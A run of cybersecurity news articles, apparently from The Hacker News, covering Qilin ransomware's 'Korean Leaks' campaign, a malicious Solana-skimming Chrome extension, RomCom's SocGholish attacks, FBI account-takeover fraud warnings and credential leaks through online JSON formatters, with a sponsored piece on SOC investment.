Users are advised to rotate all tokens and keys, audit all dependencies, remove compromised versions, reinstall clean packages, and harden developer and CI/CD environments with least-privilege access, secret scanning, and automated policy enforcement. “Sha1-Hulud is another reminder that the modern software supply chain is still way too easy to break,” Dan Lorenc, co-founder and CEO of Chainguard, said. “A single compromised maintainer and a malicious install script is all it takes to ripple through thousands of downstream projects in a matter of hours.” “The techniques attackers are using are constantly evolving. Most of these attacks don’t rely on zero-days.
They exploit the gaps in how open source software is published, packaged, and pulled into production systems. The only real defense is changing the way software gets built and consumed.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Qilin Ransomware Turns South Korean MSP Breach Into 28-Victim ‘Korean Leaks’ Data Heist
South Korea’s financial sector has been targeted by what has been described as a sophisticated supply chain attack that led to the deployment of Qilin ransomware. “This operation combined the capabilities of a major Ransomware-as-a-Service (RaaS) group, Qilin, with potential involvement from North Korean state-affiliated actors (Moonstone Sleet), leveraging Managed Service Provider (MSP) compromise as the initial access vector,” Bitdefender said in a report shared with The Hacker News. Qilin has emerged as one of the most active ransomware operations this year, with the RaaS crew exhibiting “explosive growth” in the month of October 2025 by claiming over 180 victims . The group is responsible for 29% of all ransomware attacks, per data from NCC Group .
The Romanian cybersecurity company said it decided to dig deeper after uncovering an unusual spike in ransomware victims from South Korea in September 2025, when it became the second-most affected country by ransomware after the U.S., with 25 cases, a significant jump from an average of about 2 victims per month between September 2024 and August 2025. Further analysis found that all 25 cases were attributed exclusively to the Qilin ransomware group, with 24 of the victims in the financial sector. The campaign was given the moniker Korean Leaks by the attackers themselves. While Qilin’s origins are likely Russian, the threat actors self-identify as “political activists” and “patriots of the country.” It follows a traditional affiliate model, which involves recruiting a diverse group of hackers to carry out the attacks in return for taking a small share of up to 20% of the illicit payments.
One particular affiliate of note is a North Korean state-sponsored actor tracked as Moonstone Sleet , which, according to Microsoft, has deployed a custom ransomware variant called FakePenny in an attack targeting an unnamed defense technology company in April 2024. Then, earlier this February, a significant pivot occurred when the adversary was observed delivering Qilin ransomware at a limited number of organizations. While it’s not exactly clear if the latest set of attacks was indeed carried out by the hacking group, the targeting of South Korean businesses aligns with its strategic objectives. Korean Leaks took place over three publication waves, resulting in the theft of over 1 million files and 2 TB of data from 28 victims.
Victim posts associated with four other entities were removed from the data leak site (DLS), suggesting that they may have been taken down either following ransom negotiations or a unique internal policy, Bitdefender said. The three waves are as follows - Wave 1 , comprising 10 victims from the financial management sector that was published on September 14, 2025 Wave 2 , comprising nine victims that were published between September 17 and 19, 2025 Wave 3 , comprising nine victims that were published between September 28 and October 4, 2025 An unusual aspect about these leaks is the departure from established tactics of exerting pressure on compromised organizations, instead leaning heavily on propaganda and political language. “The entire campaign was framed as a public-service effort to expose systemic corruption, exemplified by the threats to release files that could be ‘evidence of stock market manipulation’ and names of ‘well-known politicians and businessmen in Korea,’” Bitdefender said of the first wave of the campaign. Subsequent waves went on to escalate the threat a notch higher, claiming that the leak of the data could pose a severe risk to the Korean financial market.
The actors also called on South Korean authorities to investigate the case, citing stringent data protection laws. A further shift in messaging was observed in the third wave, where the group initially continued the same theme of a national financial crisis resulting from the release of stolen information, but then switched to a language that “more closely resembled Qilin’s typical, financially motivated extortion messages.” Given that Qilin boasts of an “in-house team of journalists” to help affiliates with writing texts for blog posts and help apply pressure during negotiations, it’s assessed that the group’s core members were behind the publication of the DLS text. “The posts contain several of the core operator’s signature grammatical inconsistencies,” Bitdefender said. “However, this control over the final draft does not mean the affiliate was excluded from having a critical say in the key messaging or overall direction of the content.” To pull off these attacks, the Qilin affiliate is said to have breached a single upstream managed service provider (MSP), leveraging the access to compromise several victims at once.
On September 23, 2025, the Korea JoongAng Daily reported that more than 20 asset management companies in the country were infected with ransomware following the compromise of GJTec. To mitigate these risks, it’s essential that organizations enforce Multi-Factor Authentication (MFA), apply the Principle of Least Privilege (PoLP) to restrict access, segment critical systems and sensitive data, and take proactive steps to reduce attack surfaces. “The MSP compromise that triggered the ‘Korean Leaks’ operation highlights a critical blind spot in cybersecurity discussions,” Bitdefender said. “Exploiting a vendor, contractor, or MSP that has access to other businesses is a more prevalent and practical route that RaaS groups seeking clustered victims can take.” Found this article interesting?
Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
When Your $2M Security Detection Fails: Can your SOC Save You?
Enterprises today are expected to have at least 6-8 detection tools, as detection is considered a standard investment and the first line of defense. Yet security leaders struggle to justify dedicating resources further down the alert lifecycle to their superiors. As a result, most organizations’ security investments are asymmetrical, robust detection tools paired with an under-resourced SOC, their last line of defense. A recent case study demonstrates how companies with a standardized SOC prevented a sophisticated phishing attack that bypassed leading email security tools.
In this case study, a cross-company phishing campaign targeted C-suite executives at multiple enterprises. Eight different email security tools across these organizations failed to detect the attack, and phishing emails reached executive inboxes. However, each organization’s SOC team detected the attack immediately after employees reported the suspicious emails. Why did all eight detection tools identically fail where the SOC succeeded?
What all these organizations have in common is a balanced investment across the alert lifecycle, which doesn’t neglect their SOC. This article examines how investing in the SOC is indispensable for organizations that have already allocated significant resources to detection tools. Additionally, a balanced SOC investment is crucial for maximizing the value of their existing detection investments. Detection tools and the SOC operate in parallel universes Understanding this fundamental disconnect explains how security gaps arise: Detection tools operate in milliseconds.
They must make instant decisions on millions of signals every day. They have no time for nuance; speed is essential. Without it, networks would come to a halt, as every email, file, and connection request would be held up for analysis. Detection tools zoom in.
They are the first to identify and isolate potential threats, but they lack an understanding of the bigger picture. Meanwhile, SOC teams operate with a 30K feet view. When alerts reach analysts, they have something detection tools lack: time and context. Consequently, the SOC tackles alerts from a different perspective: They can analyze behavioral patterns, such as why an executive suddenly logs in from a datacenter IP address when they usually work from London.
They can stitch data across tools. They can view a clean reputation email domain along with subsequent authentication attempts and user reports. They can identify patterns that only make sense when seen together, such as exclusive targeting of finance executives combined with timing that aligns with payroll cycles. Three critical risks of an underfunded SOC First, it can make it more difficult for executive leadership to identify the root of the problem.
CISOs and budget holders in organizations that deploy various detection tools often assume their investments will keep them safe. Meanwhile, the SOC experiences this differently, overwhelmed by noise and lacking the resources to properly investigate real threats. Because detection spending is obvious, while SOC struggles happen behind closed doors, security leaders find it challenging to demonstrate the need for additional investment in their SOC. Second, the asymmetry overwhelms the last line of defense.
Significant investments in multiple detection tools produce thousands of alerts that flood the SOC every day. With underfunded SOCs, analysts become goalies facing hundreds of shots at once, forced to make split-second decisions under immense pressure. Third, it undermines the ability to identify nuanced threats. When the SOC is overwhelmed by alerts, the capacity for detailed investigative work is lost.
The threats that escape detection are the ones that detection tools would never catch in the first place. From temporary fixes to sustainable SOC operations When detection tools generate hundreds of alerts daily, adding a few more SOC analysts is as effective as trying to save a sinking ship with a bucket. The traditional alternative has been outsourcing to MSSPs or MDRs and assigning external teams to handle overflow. But for many, the trade-offs are still too much: high ongoing costs, shallow analyst investigations that are unfamiliar with your environment, delays in coordination, and broken communication.
Outsourcing doesn’t fix the imbalance; it just shifts the burden onto someone else’s plate. Today, AI SOC platforms are becoming the preferred choice for organizations with lean SOC teams looking for an efficient, cost-effective, and scalable solution. AI SOC platforms operate at the investigation layer where contextual reasoning happens, automate alert triage, and surface only high-fidelity incidents after assigning them context. With the help of AI SOC, analysts save hundreds of hours each month, as false-positive rates often drop by more than 90%.
This automated coverage enables small internal teams to provide 24/7 coverage without additional staffing or outsourcing. The companies featured in this case study invested in this approach through Radiant Security, an agentic AI SOC platform. 2 ways SOC investment pays off, now and later SOC investments make the cost of detection tools worthwhile. Your detection tools are only as effective as your ability to investigate their alerts.
When 40% of alerts go uninvestigated, you’re not getting the full value of every detection tool you own. Without sufficient SOC capacity, you’re paying for detection capabilities that you can’t fully utilize. The last line’s unique perspective will become increasingly critical. SOC will become increasingly essential as detection tools fail more often.
As attacks grow more sophisticated, detection will need more context. The SOC’s perspective will mean only they can connect these dots and see the entire picture. 3 questions to guide your next security budget Is your security investment symmetric? Begin by assessing your resource allocation for imbalance.
The first indication of asymmetrical security is having more alerts than your SOC can handle. If your analysts are overwhelmed by alerts, it means your frontline is exceeding your backline. Is your SOC a qualified safety net? Every SOC leader must ask, if detection fails, is the SOC prepared to catch what gets through?
Many organizations never ask this because they don’t see detection as the SOC’s responsibility. But when detection tools fail, responsibilities shift. Are you underutilizing existing tools? Many organizations find that their detection tools produce valuable signals that no one has time to investigate.
Asymmetry means lacking the ability to act on what you already possess. Key takeaways from Radiant Security Most security teams have the opportunity to allocate resources to maximize ROI from their current detection investments, support future growth, and enhance protection. Organizations that invest in detection tools but neglect their SOC create blind spots and burnout. Radiant Security , the agentic AI SOC platform highlighted in the case study, shows success through balanced security investment.
Radiant works at the SOC investigation layer, automatically triaging every alert, cutting false positives by about 90%, and analyzing threats at machine speed, like a top analyst. With over 100 integrations with existing security tools and one-click response features, Radiant helps lean security teams investigate any alert, known or unknown, without needing impossible headcount increases. Radiant security makes enterprise-grade SOC capabilities available to organizations of any size. Found this article interesting?
This article is a contributed piece from one of our valued partners. Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Chrome Extension Caught Injecting Hidden Solana Transfer Fees Into Raydium Swaps
Cybersecurity researchers have discovered a new malicious extension on the Chrome Web Store that’s capable of injecting a stealthy Solana transfer into a swap transaction and transferring the funds to an attacker-controlled cryptocurrency wallet. The extension, named Crypto Copilot , was first published by a user named “sjclark76” on May 7, 2024. The developer describes the browser add-on as offering the ability to “trade crypto directly on X with real-time insights and seamless execution.” The extension has 12 installs and remains available for download as of writing. “Behind the interface, the extension injects an extra transfer into every Solana swap, siphoning a minimum of 0.0013 SOL or 0.05% of the trade amount to a hardcoded attacker-controlled wallet,” Socket security researcher Kush Pandya said in a Tuesday report.
Specifically, the extension incorporates obfuscated code that comes to life when a user performs a Raydium swap, manipulating it to inject an undisclosed SOL transfer into the same signed transaction. Raydium is a decentralized exchange (DEX) and automated market maker (AMM) built on the Solana blockchain. It works by appending a hidden SystemProgram.transfer util method to each swap before the user’s signature is requested, and sends the fee to a hard-coded wallet embedded in the code. The fee is calculated based on the amount traded, charging a minimum of 0.0013 SOL for trades and 2.6 SOL and 0.05% of the swap amount if it’s more than 2.6 SOL.
To avoid detection, the malicious behavior is concealed using techniques like minification and variable renaming. The extension also communicates with a backend hosted on the domain “crypto-coplilot-dashboard.vercel[.]app” to register connected wallets, fetch points and referral data, and report user activity. The domain, along with “cryptocopilot[.]app,” does not host any real product. What’s notable about the attack is that users are completely kept in the dark about the hidden platform fee, and the user interface only shows details of the swap.
Furthermore, Crypto Copilot makes use of legitimate services like DexScreener and Helius RPC to lend it a veneer of trust. “Because this transfer is added silently and sent to a personal wallet rather than a protocol treasury, most users will never notice it unless they inspect each instruction before signing,” Pandya said. “The surrounding infrastructure appears designed only to pass Chrome Web Store review and provide a veneer of legitimacy while siphoning fees in the background.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
RomCom Uses SocGholish Fake Update Attacks to Deliver Mythic Agent Malware
The threat actors behind a malware family known as RomCom targeted a U.S.-based civil engineering company via a JavaScript loader dubbed SocGholish to deliver the Mythic Agent. “This is the first time that a RomCom payload has been observed being distributed by SocGholish,” Arctic Wolf Labs researcher Jacob Faires said in a Tuesday report. The activity has been attributed with medium-to-high confidence to Unit 29155 of Russia’s Main Directorate of the General Staff of the Armed Forces of the Russian Federation, also known as GRU. According to the cybersecurity company, the targeted entity had worked for a city with close ties to Ukraine in the past.
SocGholish (aka FakeUpdates), linked to a financially motivated operator tracked as TA569 (aka Gold Prelude, Mustard Tempest, Purple Vallhund, and UNC1543), serves as an initial access broker, allowing other threat actors to drop a wide range of payloads. Some of its known customers are Evil Corp, LockBit, Dridex, and Raspberry Robin. The attack chains typically involve serving fake browser update alerts for Google Chrome or Mozilla Firefox on legitimate-but-compromised websites to trick unsuspecting users into downloading malicious JavaScript that’s responsible for installing a loader, which then fetches additional malware. For the most part, the attacks single out websites that are poorly secured, taking advantage of known security vulnerabilities in plugins to inject JavaScript code that’s designed to display the pop-up and activate the infection chain.
RomCom (aka Nebulous Mantis, Storm-0978, Tropical Scorpius, UNC2596, or Void Rabisu), on the other hand, is the name assigned to a Russia-aligned threat actor that’s known to dabble in both cybercrime and espionage operations since at least 2022. The threat actor leverages several methods, including spear-phishing and zero-day exploits, to breach target networks and drop the eponymous remote access trojan (RAT) on victim machines. Attacks mounted by the hacking group have singled out entities in Ukraine, as well as NATO-related defense organizations. In the attack analyzed by Arctic Wolf, the fake update payload allows the threat actors to run commands on the compromised machine by means of a reverse shell established to a command-and-control (C2) server.
This includes conducting reconnaissance and dropping a custom Python backdoor codenamed VIPERTUNNEL. Also delivered is a RomCom-linked DLL loader that launches the Mythic Agent, a crucial component of the cross-platform, post-exploit, red teaming framework that communicates with a corresponding server to support command execution, file operations, and others. While the attack was ultimately unsuccessful and was blocked before it could progress any further, the development shows the RomCom threat actor’s continued interest in targeting Ukraine or entities providing assistance to the country, no matter how tenuous the connection may be. “The timeline from infection via [the fake update] to the delivery of RomCom’s loader was less than 30 minutes,” Jacob Faires said.
“Delivery is not made until the target’s Active Directory domain has been verified to match a known value provided by the threat actor.” “The widespread nature of SocGholish attacks and the relative speed at which the attack progresses from initial access to infection makes it a potent threat to organizations worldwide.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
FBI Reports $262M in ATO Fraud as Researchers Cite Growing AI Phishing and Holiday Scams
The U.S. Federal Bureau of Investigation (FBI) has warned that cybercriminals are impersonating financial institutions with an aim to steal money or sensitive information to facilitate account takeover (ATO) fraud schemes. The activity targets individuals, businesses, and organizations of varied sizes and across sectors, the agency said, adding the fraudulent schemes have led to more than $262 million in losses since the start of the year. The FBI said it has received over 5,100 complaints.
ATO fraud typically refers to attacks that enable threat actors to obtain unauthorized access to an online financial institution, payroll system, or health savings account to siphon data and funds for personal gain. The access is often obtained by approaching targets through social engineering techniques, such as texts, calls, and emails that prey on users’ fears, or via bogus websites. These methods make it possible for attackers to deceive users into providing their login credentials on a phishing site, in some instances, urging them to click on a link to report purported fraudulent transactions recorded against their accounts. “A cybercriminal manipulates the account owner into giving away their login credentials, including multi-factor authentication (MFA) code or One-Time Passcode (OTP), by impersonating a financial institution employee, customer support, or technical support personnel,” the FBI said.
“The cybercriminal then uses login credentials to log into the legitimate financial institution website and initiate a password reset, ultimately gaining full control of the accounts.” Other cases involve threat actors masquerading as financial institutions contacting account owners, claiming their information was used to make fraudulent purchases, including firearms, and then convincing them to provide their account information to a second cybercriminal impersonating law enforcement. The FBI said ATO fraud can also involve the use of Search Engine Optimization (SEO) poisoning to trick users looking for businesses on search engines into clicking on phony links that redirect to a lookalike site by means of malicious search engine ads. Regardless of the method used, the attacks have one aim: to seize control of the accounts and swiftly wire funds to other accounts under their control, and change the passwords, effectively locking out the account owner. The accounts to which the money is transferred are further linked to cryptocurrency wallets to convert them into digital assets and obscure the money trail.
To stay protected against the threat, users are advised to be careful when sharing about themselves online or on social media, regularly monitor accounts for any financial irregularities, use unique, complex passwords, ensure the URL of the banking websites before signing in, and stay vigilant against phishing attacks or suspicious callers. “By openly sharing information like a pet’s name, schools you have attended, your date of birth, or information about your family members, you may give scammers the information they need to guess your password or answer your security questions,” the FBI said. “The large majority of ATO accounts referenced in the FBI announcement occur through compromised credentials used by threat actors intimately familiar with the internal processes and workflows for money movement within financial institutions,” Jim Routh, chief trust officer at Saviynt, said in a statement. “The most effective controls to prevent these attacks are manual (phone calls for verification) and SMS messages for approval.
The root cause continues to be the accepted use of credentials for cloud accounts despite having passwordless options available.” The development comes as Darktrace , Flashpoint , Forcepoint , Fortinet , and Zimperium have highlighted the major cybersecurity threats ahead of the holiday season, including Black Friday scams, QR code fraud, gift card draining, and high-volume phishing campaigns that mimic popular brands like Amazon and Temu. Many of these activities leverage artificial intelligence (AI) tools to produce highly persuasive phishing emails, fake websites, and social media ads, allowing even low-skill attackers to pull off attacks that appear trustworthy and increase the success rate of their campaigns. Fortinet FortiGuard Labs said it detected at least 750 malicious, holiday-themed domains registered over the last three months, with many using key terms like “Christmas,” “Black Friday,” and “Flash Sale.” “Over the last three months, more than 1.57 million login accounts tied to major e-commerce sites, available through stealer logs, were collected across underground markets,” the company said. Attackers have also been found actively exploiting security vulnerabilities across Adobe/Magento, Oracle E-Business Suite, WooCommerce, Bagisto, and other common e-commerce platforms.
Some of the exploited vulnerabilities include CVE-2025-54236, CVE-2025-61882, and CVE-2025-47569. According to Zimperium zLabs, there has been a 4x increase in mobile phishing (aka mishing) sites, with attackers leveraging trusted brand names to create urgency and deceive users into clicking, logging in, or downloading malicious updates.” What’s more, Recorded Future has called attention to purchase scams where threat actors use fake e-commerce stores to steal victim data and authorize fraudulent payments for non-existent goods and services. It described the scams as a “major emerging fraud threat.” The scam operations, per the cybersecurity company, work in multi-stage attack funnels targeting specific victims using a traffic distribution system ( TDS ) to determine if they are deemed appropriate and initiate a redirect chain to lead them to the final stage, where the victim-authorized transaction takes place. The main advantage of this scam is that payments are authorized by the victims themselves, offering operators immediate financial payouts.
In contrast, other fraud attack vectors require considerable investment of time and resources to cash out stolen data. Select purchase scams have also been found to use transaction recovery services to attempt two sequential fraudulent transactions, thereby double-monetizing the card information. “A sophisticated dark web ecosystem allows threat actors to quickly establish new purchase scam infrastructure and amplify their impact,” the company said . “Promotional activities mirroring traditional marketing – including an offer to sell stolen card data on the dark web carding shop PP24 – are widespread in this underground.” “Threat actors fund ad campaigns with stolen payment cards to spread purchase scams, which in turn compromise more payment card data, fueling a continuing cycle of fraud.
Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Years of JSONFormatter and CodeBeautify Leaks Expose Thousands of Passwords and API Keys
New research has found that organizations in various sensitive sectors, including governments, telecoms, and critical infrastructure, are pasting passwords and credentials into online tools like JSONformatter and CodeBeautify that are used to format and validate code. Cybersecurity company watchTowr Labs said it captured a dataset of over 80,000 files on these sites, uncovering thousands of usernames, passwords, repository authentication keys, Active Directory credentials, database credentials, FTP credentials, cloud environment keys, LDAP configuration information, helpdesk API keys, meeting room API keys, SSH session recordings, and all kinds of personal information. This includes five years of historical JSONFormatter content and one year of historical CodeBeautify content, totalling over 5GB worth of enriched, annotated JSON data. Organizations impacted by the leak span critical national infrastructure, government, finance, insurance, banking, technology, retail, aerospace, telecommunications, healthcare, education, travel, and, ironically, cybersecurity sectors.
“These tools are extremely popular, often appearing near the top of search results for terms like ‘JSON beautify’ and ‘best place to paste secrets’ (probably, unproven) – and used by a wide variety of organizations, organisms, developers, and administrators in both enterprise environments and for personal projects,” security researcher Jake Knott said in a report shared with The Hacker News. Both tools also offer the ability to save a formatted JSON structure or code, turning it into a semi-permanent, shareable link with others – effectively allowing anyone with access to the URL to access the data. As it happens, the sites not only provide a handy Recent Links page to list all recently saved links, but also follow a predictable URL format for the shareable link, thereby making it easier for a bad actor to retrieve all URLs using a simple crawler - https://jsonformatter.org/{id-here} https://jsonformatter.org/{formatter-type}/{id-here} https://codebeautify.org/{formatter-type}/{id-here} Some examples of leaked information include Jenkins secrets, a cybersecurity company exposing encrypted credentials for sensitive configuration files, Know Your Customer (KYC) information associated with a bank, a major financial exchange’s AWS credentials linked to Splunk, and Active Directory credentials for a bank. To make matters worse, the company said it uploaded fake AWS access keys to one of these tools, and found bad actors attempting to abuse them 48 hours after it was saved.
This indicates that valuable information exposed through these sources is being scraped by other parties and tested, posing severe risks. “Mostly because someone is already exploiting it, and this is all really, really stupid,” Knott said. “We don’t need more AI-driven agentic agent platforms; we need fewer critical organizations pasting credentials into random websites.” When checked by The Hacker News, both JSONFormatter and CodeBeautify have temporarily disabled the save functionality, claiming they are “working on to make it better” and implementing “enhanced NSFW (Not Safe For Work) content prevention measures.” watchTowr said that the save functionality was disabled by these sites likely in response to the research. “We suspect this change occurred in September in response to communication from a number of the affected organizations we alerted,” it added.
Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.